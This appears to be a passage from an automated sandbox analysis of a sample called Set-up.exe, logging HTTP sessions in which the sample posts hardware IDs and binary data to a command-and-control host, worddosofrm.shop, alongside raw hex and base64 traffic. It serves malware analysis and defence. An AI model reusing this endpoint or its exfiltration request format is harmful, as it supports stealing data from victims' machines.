                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 70 73 2b 51 5a 49 75 51 56 67 32 73 33 71 6b 53 56 45 2b 79 36 55 35 56 2b 37 68 71 68 48 38 35 59 47 31 36 6f 73 50 4b 63 65 4b 44 36 73 46 56 75 6f 31 57 50 65 58 50 79 41 37 63 52 2b 62 35 2f 6d 32 6a 74 56 4c 6c 56 32 78 45 52 56 4f 6a 76 74 70 35 76 72 66 69 36 55 53 37 2f 45 49 5a 71 4d 71 42 46 6d 52 76 6a 75 31 43 5a 65 65 49 59 70 68 7a 46 51 77 52 64 72 71 58 38 32 53 54 6c 39 4b 51 5a 64 71 30 6a 6d 48 59 69 76 41 47 74 46 65 47 7a 56 34 34 35 2b 31 71 2f 57 38 56 64 56 67 44 6f 76 50 61 56 62 61 33 31 75 46 45 68 34 68 79 61 59 44 2b 6b 55 5a 38 57 35 72 4e 66 6c 48 44 70 45 36 73 51 79 46 77 53 58 36 6e 33 75 4e 6c 74 76 62 50 6b 47 52 6a 39 47 49 52 50 4f 4b 5a 4b 32 41 6d 68 70 42 43 66 64 61 52 4d 35 68 2f 4f 57 52 78 58 6f 62 33 38 6c 6d
                                                                                                                                Data Ascii: ps+QZIuQVg2s3qkSVE+y6U5V+7hqhH85YG16osPKceKD6sFVuo1WPeXPyA7cR+b5/m2jtVLlV2xERVOjvtp5vrfi6US7/EIZqMqBFmRvju1CZeeIYphzFQwRdrqX82STl9KQZdq0jmHYivAGtFeGzV445+1q/W8VdVgDovPaVba31uFEh4hyaYD+kUZ8W5rNflHDpE6sQyFwSX6n3uNltvbPkGRj9GIRPOKZK2AmhpBCfdaRM5h/OWRxXob38lm
                                                                                                                                2024-11-07 16:39:22 UTC195INData Raw: 47 57 43 74 45 70 41 68 61 2b 70 73 76 79 4f 74 6e 47 72 59 5a 71 6f 4e 35 68 7a 4f 45 55 34 59 70 4c 54 36 6b 57 57 6a 2b 72 42 54 4a 2b 59 5a 67 32 55 2f 6f 30 61 65 46 2b 71 34 55 5a 78 31 37 68 4b 6c 47 4d 31 65 47 56 44 6f 2b 62 61 65 63 75 57 72 2f 48 77 35 35 68 75 4f 49 53 7a 6b 57 74 67 52 34 2f 30 49 32 48 58 74 45 71 41 65 7a 6c 41 51 55 4b 32 2f 38 70 68 73 6f 2f 43 7a 58 53 76 73 47 6f 78 74 50 61 42 43 6d 52 72 6b 73 6c 75 64 4f 61 70 55 6f 51 4f 43 43 56 5a 70 71 36 48 68 69 57 62 6c 37 50 4a 41 62 75 6f 5a 79 44 6c 7a 71 31 47 53 48 4f 47 34 58 35 31 36 36 0d 0a
                                                                                                                                Data Ascii: GWCtEpAha+psvyOtnGrYZqoN5hzOEU4YpLT6kWWj+rBTJ+YZg2U/o0aeF+q4UZx17hKlGM1eGVDo+baecuWr/Hw55huOISzkWtgR4/0I2HXtEqAezlAQUK2/8phso/CzXSvsGoxtPaBCmRrksludOapUoQOCCVZpq6HhiWbl7PJAbuoZyDlzq1GSHOG4X5166
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 33 35 38 66 0d 0a 78 4f 72 48 63 35 62 48 31 43 75 75 50 2b 4c 61 61 6e 39 75 31 63 69 34 78 69 43 59 6a 37 71 44 64 67 52 39 2f 30 49 32 46 58 6a 47 59 67 51 7a 6c 5a 57 52 2b 61 75 74 70 35 6d 35 61 76 38 56 53 54 68 48 49 68 6f 4e 71 4a 49 6b 52 50 75 74 6c 57 62 66 2b 6b 62 72 77 6e 49 55 68 68 62 70 4c 76 77 6d 47 6d 33 2b 37 55 5a 59 4b 30 53 6b 43 46 72 36 6d 4b 57 47 2f 75 36 51 4e 68 6d 71 67 33 6d 48 4d 34 52 54 68 69 72 74 76 6d 61 61 36 6a 31 74 56 45 75 36 78 43 48 62 44 32 74 52 4a 67 62 34 62 4a 57 6b 48 54 6f 48 36 67 53 78 46 45 58 55 75 6a 35 74 70 35 79 35 61 76 38 61 53 33 74 46 5a 4d 68 4c 4f 52 61 32 42 48 6a 2f 51 6a 59 61 2b 34 64 70 68 6a 4e 56 68 4a 54 70 4c 4c 7a 6c 6d 6d 73 39 72 56 58 50 4f 51 62 67 47 6b 38 72 30 69 59 47 2b
                                                                                                                                Data Ascii: 358fxOrHc5bH1CuuP+Laan9u1ci4xiCYj7qDdgR9/0I2FXjGYgQzlZWR+autp5m5av8VSThHIhoNqJIkRPutlWbf+kbrwnIUhhbpLvwmGm3+7UZYK0SkCFr6mKWG/u6QNhmqg3mHM4RThirtvmaa6j1tVEu6xCHbD2tRJgb4bJWkHToH6gSxFEXUuj5tp5y5av8aS3tFZMhLORa2BHj/QjYa+4dphjNVhJTpLLzlmms9rVXPOQbgGk8r0iYG+
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 65 4f 34 47 74 42 66 4c 57 52 4e 55 6f 37 6e 77 69 32 79 71 2b 72 39 61 4a 2b 6f 64 68 47 73 77 72 51 50 57 56 75 69 6c 45 4d 41 35 78 77 4f 32 46 6f 4a 4f 57 45 48 6f 73 50 72 5a 4d 75 58 37 73 56 45 6b 36 52 4b 46 5a 6a 57 6a 55 5a 45 54 34 62 31 55 6b 33 62 69 45 4b 55 62 30 46 63 53 55 4b 75 36 2b 35 64 70 6f 62 50 79 47 53 6e 31 56 64 41 68 41 61 64 4e 67 78 6e 6f 72 46 72 59 5a 71 6f 4e 35 68 7a 4f 45 55 34 59 72 4c 6e 6b 6b 6d 75 75 2b 4c 4a 65 49 65 67 66 69 47 34 33 71 55 32 54 46 2b 79 31 58 5a 56 33 37 68 32 76 48 4d 35 56 45 52 6a 6d 39 2f 47 42 4b 76 32 7a 6c 33 67 44 77 52 4b 53 49 53 7a 6b 57 74 67 52 34 2f 30 49 32 48 58 74 47 4b 77 51 78 56 73 59 55 61 61 38 35 49 74 70 6f 66 43 31 57 69 6e 6b 47 34 68 6d 4e 71 52 45 6d 52 33 72 74 31 4f
                                                                                                                                Data Ascii: eO4GtBfLWRNUo7nwi2yq+r9aJ+odhGswrQPWVuilEMA5xwO2FoJOWEHosPrZMuX7sVEk6RKFZjWjUZET4b1Uk3biEKUb0FcSUKu6+5dpobPyGSn1VdAhAadNgxnorFrYZqoN5hzOEU4YrLnkkmuu+LJeIegfiG43qU2TF+y1XZV37h2vHM5VERjm9/GBKv2zl3gDwRKSISzkWtgR4/0I2HXtGKwQxVsYUaa85ItpofC1WinkG4hmNqREmR3rt1O
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 50 35 62 77 31 6f 63 56 36 57 30 38 4a 70 68 6f 50 6d 39 58 69 62 67 42 34 74 75 50 4b 35 44 6c 78 44 70 76 46 2b 65 66 75 30 56 72 68 79 43 48 31 5a 66 73 50 65 75 32 55 53 69 38 4c 67 5a 4d 61 4d 4d 79 47 59 2f 36 68 76 59 46 75 57 33 57 70 5a 35 34 77 61 67 45 73 4a 53 42 46 75 75 76 2f 43 56 5a 71 6a 37 74 56 6b 72 35 68 69 44 62 44 57 71 53 4a 6c 57 6f 66 31 58 67 44 6d 38 56 4a 63 57 7a 46 55 59 57 37 69 77 74 6f 59 6b 76 4c 4f 37 56 57 36 31 56 59 64 6f 49 61 31 47 6b 42 2f 76 73 31 6d 52 66 75 41 58 70 78 2f 4f 58 68 39 62 6f 4c 62 2b 6c 6d 6d 6c 2b 4c 52 54 4c 2b 4d 51 79 43 39 7a 72 56 76 59 54 71 2b 53 55 35 31 79 35 56 61 42 48 63 56 64 56 6b 66 6d 72 72 61 65 5a 75 57 72 2f 46 6f 71 34 78 79 48 5a 54 6d 74 51 35 38 51 37 37 56 62 6c 58 4c 32
                                                                                                                                Data Ascii: P5bw1ocV6W08JphoPm9XibgB4tuPK5DlxDpvF+efu0VrhyCH1ZfsPeu2USi8LgZMaMMyGY/6hvYFuW3WpZ54wagEsJSBFuuv/CVZqj7tVkr5hiDbDWqSJlWof1XgDm8VJcWzFUYW7iwtoYkvLO7VW61VYdoIa1GkB/vs1mRfuAXpx/OXh9boLb+lmml+LRTL+MQyC9zrVvYTq+SU51y5VaBHcVdVkfmrraeZuWr/Foq4xyHZTmtQ58Q77VblXL2
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 42 58 46 55 36 72 38 4d 69 6e 61 62 50 2b 73 31 49 76 30 79 75 6d 62 44 4b 70 54 64 6f 6e 2b 62 42 41 6d 33 7a 6a 4b 70 67 56 78 55 55 52 56 71 36 33 74 74 63 71 71 72 50 6b 59 47 36 6c 56 62 63 76 63 37 49 44 77 46 62 61 76 6c 36 57 66 76 49 46 36 7a 6a 55 58 42 6c 54 71 66 65 34 32 57 7a 6c 71 2b 77 58 62 75 6b 45 79 44 6c 6a 2b 42 6a 4e 52 62 6a 74 41 6f 63 33 2f 56 53 77 57 35 6f 44 57 42 69 36 39 36 37 5a 4c 61 76 2b 76 56 6f 67 37 67 65 61 5a 7a 43 38 51 4e 38 6f 30 5a 78 64 6b 33 58 70 47 36 30 6c 2f 48 41 62 55 36 53 36 2b 5a 4a 55 6d 2b 61 2f 56 79 44 71 41 35 6b 68 66 65 70 4d 32 45 37 57 2f 52 6a 59 52 71 70 55 76 6c 75 61 45 53 4e 62 70 72 6e 78 6a 33 76 6f 30 72 46 53 49 75 41 61 67 79 46 39 36 6b 58 59 54 72 2f 7a 45 4a 78 6f 70 45 7a 32 53
                                                                                                                                Data Ascii: BXFU6r8MinabP+s1Iv0yumbDKpTdon+bBAm3zjKpgVxUURVq63ttcqqrPkYG6lVbcvc7IDwFbavl6WfvIF6zjUXBlTqfe42Wzlq+wXbukEyDlj+BjNRbjtAoc3/VSwW5oDWBi6967ZLav+vVog7geaZzC8QN8o0Zxdk3XpG60l/HAbU6S6+ZJUm+a/VyDqA5khfepM2E7W/RjYRqpUvluaESNbprnxj3vo0rFSIuAagyF96kXYTr/zEJxopEz2S
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 6d 67 37 76 77 6e 6e 43 69 39 5a 70 35 62 71 4e 56 68 79 46 72 6b 77 50 51 56 74 44 7a 45 49 41 35 76 46 53 54 47 4d 78 66 45 55 36 35 2b 74 4f 4f 61 62 58 31 76 78 6c 67 72 52 50 49 4f 57 50 6b 41 35 77 48 72 2b 55 41 79 69 4b 78 52 2f 46 4c 6b 45 35 59 51 65 69 68 74 73 45 34 36 37 4f 75 47 58 61 74 55 6f 74 7a 49 61 78 41 6a 68 57 6f 67 32 36 2b 65 76 55 65 68 78 62 53 56 69 68 6d 76 62 54 34 6c 32 32 7a 34 76 77 58 62 75 4a 56 30 46 68 7a 34 67 2b 65 46 66 6e 39 62 39 59 35 2f 46 54 2b 57 2f 64 53 47 46 61 76 6f 65 66 55 54 4b 62 69 74 6e 67 6a 2f 52 4c 49 4c 33 4f 73 41 38 42 46 6f 66 31 55 69 54 6d 38 52 50 52 41 6c 77 4a 42 43 50 71 6f 75 49 41 71 73 37 50 6b 43 32 43 74 42 38 67 35 63 2b 31 41 69 67 54 70 76 6b 61 62 50 74 6f 71 6b 78 6a 4d 58 78
                                                                                                                                Data Ascii: mg7vwnnCi9Zp5bqNVhyFrkwPQVtDzEIA5vFSTGMxfEU65+tOOabX1vxlgrRPIOWPkA5wHr+UAyiKxR/FLkE5YQeihtsE467OuGXatUotzIaxAjhWog26+evUehxbSVihmvbT4l22z4vwXbuJV0Fhz4g+eFfn9b9Y5/FT+W/dSGFavoefUTKbitngj/RLIL3OsA8BFof1UiTm8RPRAlwJBCPqouIAqs7PkC2CtB8g5c+1AigTpvkabPtoqkxjMXx


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.449736104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:23 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=J0PC41K8W4FXK9GUKSTP
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 18178
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:23 UTC15331OUTData Raw: 2d 2d 4a 30 50 43 34 31 4b 38 57 34 46 58 4b 39 47 55 4b 53 54 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 4a 30 50 43 34 31 4b 38 57 34 46 58 4b 39 47 55 4b 53 54 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 30 50 43 34 31 4b 38 57 34 46 58 4b 39 47 55 4b 53 54 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d
                                                                                                                                Data Ascii: --J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="pid"2--J0PC41K8W4FXK9GUKSTPContent-Disposition: form-data; name="lid"BVnUqo-
                                                                                                                                2024-11-07 16:39:23 UTC2847OUTData Raw: 67 9f eb a4 8c a1 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5
                                                                                                                                Data Ascii: gyA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IU
                                                                                                                                2024-11-07 16:39:24 UTC1013INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=7p026fbc5r7ps2it61vlfq13lf; expires=Mon, 03-Mar-2025 10:26:03 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TjNo4KBjOaN83mE1cR%2FtQrnQ7yTC52VYsxd1aG25%2Fr%2FuhTuBnurSpgO5XL8qUXyXIjpbCcCy6HviySTCIh8MHC0qYL%2F24v4zD7kj3BqnU3Yp7TJIyjbU5BDcR9AlgYRpnzvf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2562e5c6c37-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19142&delivery_rate=1906517&cwnd=230&unsent_bytes=0&cid=0e75ee99c14f0156&ts=691&x=0"
                                                                                                                                2024-11-07 16:39:24 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.449740104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:25 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=8F9JUVKTD98FLYNGQWCQ
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8799
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:25 UTC8799OUTData Raw: 2d 2d 38 46 39 4a 55 56 4b 54 44 39 38 46 4c 59 4e 47 51 57 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 38 46 39 4a 55 56 4b 54 44 39 38 46 4c 59 4e 47 51 57 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 46 39 4a 55 56 4b 54 44 39 38 46 4c 59 4e 47 51 57 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d
                                                                                                                                Data Ascii: --8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="pid"2--8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="lid"BVnUqo-
                                                                                                                                2024-11-07 16:39:25 UTC1009INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=015h3n0i1nnvngdp9s43tvth6d; expires=Mon, 03-Mar-2025 10:26:04 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NZDPNt%2Bv1C9zHiVuJpZbonGfgZvNhhRg%2BwqInteV4csE9YxibQrh5ECzhk8MNnTkfJeaQ0cggCf9vEXbuur4dAP7tWUP9JHjlyz513njITT0CB2pFzp73wkJJ1rk%2Fhjh1r8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec25edef62ca9-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1666&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9740&delivery_rate=1715639&cwnd=251&unsent_bytes=0&cid=c4c6861afa997760&ts=797&x=0"
                                                                                                                                2024-11-07 16:39:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.449742104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:26 UTC295OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=LQ7KQ0ZXPZEACXIL5P81AH845VEGG8T
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 20518
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:26 UTC15331OUTData Raw: 2d 2d 4c 51 37 4b 51 30 5a 58 50 5a 45 41 43 58 49 4c 35 50 38 31 41 48 38 34 35 56 45 47 47 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 4c 51 37 4b 51 30 5a 58 50 5a 45 41 43 58 49 4c 35 50 38 31 41 48 38 34 35 56 45 47 47 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 51 37 4b 51 30 5a 58 50 5a 45 41 43 58 49 4c 35 50 38 31 41 48 38 34 35 56 45 47 47 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                Data Ascii: --LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition: form-data; name="pid"3--LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition:
                                                                                                                                2024-11-07 16:39:26 UTC5187OUTData Raw: 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: `aO`,li`M?lrQMn 64F6(X
                                                                                                                                2024-11-07 16:39:27 UTC1009INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=kgnt7gk40kl5htpfvhuunso0t4; expires=Mon, 03-Mar-2025 10:26:06 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9a%2B00sizMV8U3C8tGGqR5hl3KTzlGH7iR2JJIuV0SusXhMatL2MmFtkHzboTCYkRlXQlBkJH9VJ2LkWwZfzQKqyg3Zauafk4j71oto7bjHrWyezvSDT%2BDQ1lL3FTE4OmfZd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2693f16e7bf-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21493&delivery_rate=2236293&cwnd=251&unsent_bytes=0&cid=b806ff1e542eb3fc&ts=813&x=0"
                                                                                                                                2024-11-07 16:39:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.449744104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:28 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=FX1DFU84BK80CT6OHR9I3CQ
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 7167
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:28 UTC7167OUTData Raw: 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a
                                                                                                                                Data Ascii: --FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="pid"1--FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="lid"
                                                                                                                                2024-11-07 16:39:29 UTC1009INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=t3hihtbth035lgu05ilofe43ni; expires=Mon, 03-Mar-2025 10:26:08 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
